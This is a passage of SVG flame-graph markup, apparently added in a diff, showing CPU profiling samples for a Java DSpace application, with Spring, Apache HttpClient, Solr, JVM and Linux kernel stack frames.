+<text  x="775.20" y="271.5" ></text>
+</g>
+<g >
+<title>futex_wait (24 samples, 11.48%)</title><rect x="26.9" y="661" width="135.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="29.94" y="671.5" >futex_wait</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getTimestamp (1 samples, 0.48%)</title><rect x="427.8" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="430.80" y="383.5" ></text>
+</g>
+<g >
+<title>update_curr (1 samples, 0.48%)</title><rect x="168.1" y="501" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="171.09" y="511.5" ></text>
+</g>
+<g >
+<title>do_sys_poll (1 samples, 0.48%)</title><rect x="930.3" y="133" width="5.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="933.29" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (13 samples, 6.22%)</title><rect x="789.1" y="309" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="319.5" >org/apac..</text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (3 samples, 1.44%)</title><rect x="365.7" y="245" width="16.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="368.69" y="255.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (16 samples, 7.66%)</title><rect x="173.7" y="549" width="90.4" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="176.73" y="559.5" >finish_tas..</text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.48%)</title><rect x="1071.4" y="197" width="5.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1074.44" y="207.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (4 samples, 1.91%)</title><rect x="320.5" y="485" width="22.6" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="323.53" y="495.5" >n..</text>
+</g>
+<g >
+<title>JVM_DoPrivileged (2 samples, 0.96%)</title><rect x="518.1" y="293" width="11.3" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="521.13" y="303.5" ></text>
+</g>
+<g >
+<title>org/springframework/context/annotation/ConfigurationClassPostProcessor$ImportAwareBeanPostProcessor:::postProcessBeforeInitialization (1 samples, 0.48%)</title><rect x="998.0" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1001.04" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="529.4" y="293" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="532.43" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/PluginManager:::configureNamedPlugin (1 samples, 0.48%)</title><rect x="608.5" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="611.47" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1156.1" y="165" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1159.12" y="175.5" ></text>
+</g>
+<g >
+<title>strncpy (1 samples, 0.48%)</title><rect x="337.5" y="437" width="5.6" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="340.46" y="447.5" ></text>
+</g>
+<g >
+<title>java/lang/System:::identityHashCode (1 samples, 0.48%)</title><rect x="772.2" y="181" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="775.20" y="191.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.48%)</title><rect x="952.9" y="373" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="955.87" y="383.5" ></text>
+</g>
+<g >
+<title>ksys_write (1 samples, 0.48%)</title><rect x="501.2" y="165" width="5.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="504.20" y="175.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="725" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="735.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (1 samples, 0.48%)</title><rect x="964.2" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="967.16" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.48%)</title><rect x="642.3" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="645.34" y="351.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.48%)</title><rect x="930.3" y="213" width="5.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="933.29" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="10.0" y="693" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="13.00" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (4 samples, 1.91%)</title><rect x="919.0" y="357" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="922.00" y="367.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="549" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="559.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/springframework/beans/PropertyEditorRegistrySupport:::createDefaultEditors (16 samples, 7.66%)</title><rect x="518.1" y="357" width="90.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="367.5" >org/spring..</text>
+</g>
+<g >
+<title>lock_sock_nested (1 samples, 0.48%)</title><rect x="297.9" y="629" width="5.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="300.94" y="639.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%)</title><rect x="704.4" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="319.5" ></text>
+</g>
+<g >
+<title>JVM_Clone (1 samples, 0.48%)</title><rect x="489.9" y="261" width="5.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="492.90" y="271.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.48%)</title><rect x="631.1" y="357" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="634.05" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="213" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::equals (1 samples, 0.48%)</title><rect x="704.4" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="271.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceSpellIndexingPlugin:::additionalIndex (2 samples, 0.96%)</title><rect x="969.8" y="405" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="972.81" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (13 samples, 6.22%)</title><rect x="789.1" y="341" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="351.5" >org/apac..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (15 samples, 7.18%)</title><rect x="777.8" y="389" width="84.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.85" y="399.5" >org/apach..</text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (4 samples, 1.91%)</title><rect x="1082.7" y="277" width="22.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1085.73" y="287.5" >J..</text>
+</g>
+<g >
+<title>do_softirq_own_stack (5 samples, 2.39%)</title><rect x="360.0" y="405" width="28.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="363.05" y="415.5" >d..</text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (1 samples, 0.48%)</title><rect x="772.2" y="309" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (2 samples, 0.96%)</title><rect x="422.2" y="389" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="425.15" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (2 samples, 0.96%)</title><rect x="597.2" y="261" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="600.18" y="271.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (4 samples, 1.91%)</title><rect x="557.7" y="293" width="22.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="560.66" y="303.5" >j..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1082.7" y="213" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1085.73" y="223.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.48%)</title><rect x="619.8" y="389" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="622.76" y="399.5" ></text>
+</g>
+<g >
+<title>switch_fpu_return (1 samples, 0.48%)</title><rect x="405.2" y="709" width="5.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="408.22" y="719.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (2 samples, 0.96%)</title><rect x="331.8" y="469" width="11.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="334.82" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::doSerialize (1 samples, 0.48%)</title><rect x="856.9" y="245" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="859.89" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1094.0" y="53" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1097.02" y="63.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (2 samples, 0.96%)</title><rect x="371.3" y="213" width="11.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="374.34" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="687.5" y="309" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="690.51" y="319.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.48%)</title><rect x="501.2" y="197" width="5.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="504.20" y="207.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (24 samples, 11.48%)</title><rect x="26.9" y="565" width="135.5" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="29.94" y="575.5" >perf_pmu_enable.p..</text>
+</g>
+<g >
+<title>all (209 samples, 100%)</title><rect x="10.0" y="789" width="1180.0" height="15.0" fill="rgb(255,130,130)" rx="2" ry="2" />
+<text  x="13.00" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (8 samples, 3.83%)</title><rect x="1116.6" y="341" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="351.5" >org/..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.48%)</title><rect x="992.4" y="133" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.48%)</title><rect x="704.4" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="303.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.48%)</title><rect x="631.1" y="277" width="5.6" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="634.05" y="287.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/MutablePropertySources:::addLast (1 samples, 0.48%)</title><rect x="546.4" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="549.36" y="335.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.48%)</title><rect x="992.4" y="181" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="191.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.48%)</title><rect x="1133.5" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="271.5" ></text>
+</g>
+<g >
+<title>tcp_queue_rcv (1 samples, 0.48%)</title><rect x="377.0" y="181" width="5.6" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="379.99" y="191.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (24 samples, 11.48%)</title><rect x="26.9" y="725" width="135.5" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="29.94" y="735.5" >entry_SYSCALL_64_..</text>
+</g>
+<g >
+<title>__x64_sys_poll (1 samples, 0.48%)</title><rect x="930.3" y="149" width="5.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="933.29" y="159.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (1 samples, 0.48%)</title><rect x="501.2" y="293" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="504.20" y="303.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.48%)</title><rect x="1156.1" y="229" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1159.12" y="239.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.48%)</title><rect x="710.1" y="373" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="713.10" y="383.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (1 samples, 0.48%)</title><rect x="473.0" y="405" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="475.97" y="415.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.48%)</title><rect x="1156.1" y="245" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1159.12" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1139.2" y="245" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1142.19" y="255.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SearchUtils:::getIgnoredMetadataFields (1 samples, 0.48%)</title><rect x="439.1" y="421" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="442.09" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemIterator:::next (2 samples, 0.96%)</title><rect x="422.2" y="437" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="425.15" y="447.5" ></text>
+</g>
+<g >
+<title>JNU_ThrowByName (1 samples, 0.48%)</title><rect x="1082.7" y="261" width="5.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1085.73" y="271.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="489.9" y="245" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="492.90" y="255.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (1 samples, 0.48%)</title><rect x="382.6" y="261" width="5.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="385.63" y="271.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="693" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="703.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>__x64_sys_poll (1 samples, 0.48%)</title><rect x="1099.7" y="213" width="5.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1102.67" y="223.5" ></text>
+</g>
+<g >
+<title>__mnt_want_write_file (1 samples, 0.48%)</title><rect x="501.2" y="69" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="504.20" y="79.5" ></text>
+</g>
+<g >
+<title>__wake_up_common_lock (1 samples, 0.48%)</title><rect x="371.3" y="149" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="374.34" y="159.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (3 samples, 1.44%)</title><rect x="924.6" y="325" width="17.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (13 samples, 6.22%)</title><rect x="981.1" y="405" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="984.10" y="415.5" >org/dspa..</text>
+</g>
+<g >
+<title>inet6_sendmsg (17 samples, 8.13%)</title><rect x="297.9" y="661" width="96.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="300.94" y="671.5" >inet6_sendmsg</text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (1 samples, 0.48%)</title><rect x="501.2" y="277" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="504.20" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractMessageParser:::parse (1 samples, 0.48%)</title><rect x="1127.9" y="229" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="239.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.96%)</title><rect x="1144.8" y="277" width="11.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1147.83" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (14 samples, 6.70%)</title><rect x="862.5" y="373" width="79.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="865.54" y="383.5" >org/apach..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.48%)</title><rect x="1060.1" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1063.14" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::&lt;init&gt; (2 samples, 0.96%)</title><rect x="636.7" y="357" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="639.70" y="367.5" ></text>
+</g>
+<g >
+<title>[unknown] (1 samples, 0.48%)</title><rect x="10.0" y="709" width="5.6" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="13.00" y="719.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="597" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="607.5" >Interpreter</text>
+</g>
+<g >
+<title>__libc_recv (20 samples, 9.57%)</title><rect x="162.4" y="757" width="113.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="165.44" y="767.5" >__libc_recv</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.96%)</title><rect x="1127.9" y="325" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::isStale (1 samples, 0.48%)</title><rect x="930.3" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="933.29" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (1 samples, 0.48%)</title><rect x="1133.5" y="245" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (10 samples, 4.78%)</title><rect x="1060.1" y="389" width="56.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1063.14" y="399.5" >org/a..</text>
+</g>
+<g >
+<title>rb_insert_color (1 samples, 0.48%)</title><rect x="1144.8" y="101" width="5.7" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1147.83" y="111.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (2 samples, 0.96%)</title><rect x="1088.4" y="101" width="11.3" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1091.37" y="111.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (5 samples, 2.39%)</title><rect x="360.0" y="389" width="28.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="363.05" y="399.5" >_..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineProxy (1 samples, 0.48%)</title><rect x="1122.2" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1125.25" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1156.1" y="197" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1159.12" y="207.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (2 samples, 0.96%)</title><rect x="1088.4" y="117" width="11.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1091.37" y="127.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (4 samples, 1.91%)</title><rect x="625.4" y="389" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="628.41" y="399.5" >o..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (8 samples, 3.83%)</title><rect x="1071.4" y="341" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1074.44" y="351.5" >org/..</text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (1 samples, 0.48%)</title><rect x="930.3" y="261" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="933.29" y="271.5" ></text>
+</g>
+<g >
+<title>enqueue_hrtimer (1 samples, 0.48%)</title><rect x="1144.8" y="117" width="5.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="1147.83" y="127.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (20 samples, 9.57%)</title><rect x="162.4" y="741" width="113.0" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="165.44" y="751.5" >entry_SYSCALL..</text>
+</g>
+<g >
+<title>ip_local_deliver (3 samples, 1.44%)</title><rect x="365.7" y="277" width="16.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="368.69" y="287.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.48%)</title><rect x="681.9" y="341" width="5.6" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="684.87" y="351.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (24 samples, 11.48%)</title><rect x="275.4" y="741" width="135.5" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="278.36" y="751.5" >entry_SYSCALL_64_..</text>
+</g>
+<g >
+<title>ext4_file_write_iter (1 samples, 0.48%)</title><rect x="501.2" y="101" width="5.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="504.20" y="111.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.48%)</title><rect x="1133.5" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%)</title><rect x="653.6" y="341" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="351.5" ></text>
+</g>
+<g >
+<title>deactivate_task (1 samples, 0.48%)</title><rect x="1150.5" y="101" width="5.6" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="1153.48" y="111.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::determineRoute (1 samples, 0.48%)</title><rect x="1071.4" y="325" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1074.44" y="335.5" ></text>
+</g>
+<g >
+<title>sock_sendmsg (18 samples, 8.61%)</title><rect x="297.9" y="677" width="101.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="300.94" y="687.5" >sock_sendmsg</text>
+</g>
+<g >
+<title>JVM_InvokeMethod (134 samples, 64.11%)</title><rect x="410.9" y="565" width="756.5" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="413.86" y="575.5" >JVM_InvokeMethod</text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (2 samples, 0.96%)</title><rect x="1088.4" y="133" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1091.37" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (1 samples, 0.48%)</title><rect x="930.3" y="309" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="933.29" y="319.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.48%)</title><rect x="698.8" y="357" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="701.80" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (12 samples, 5.74%)</title><rect x="789.1" y="213" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="223.5" >org/apa..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (3 samples, 1.44%)</title><rect x="1015.0" y="341" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1017.98" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/SolrBrowseCreateDAO:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="992.4" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="995.39" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (4 samples, 1.91%)</title><rect x="1082.7" y="325" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1085.73" y="335.5" >o..</text>
+</g>
+<g >
+<title>finish_task_switch (24 samples, 11.48%)</title><rect x="26.9" y="597" width="135.5" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="29.94" y="607.5" >finish_task_switch</text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory$1:::run (2 samples, 0.96%)</title><rect x="518.1" y="245" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="255.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (4 samples, 1.91%)</title><rect x="1082.7" y="309" width="22.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1085.73" y="319.5" >j..</text>
+</g>
+<g >
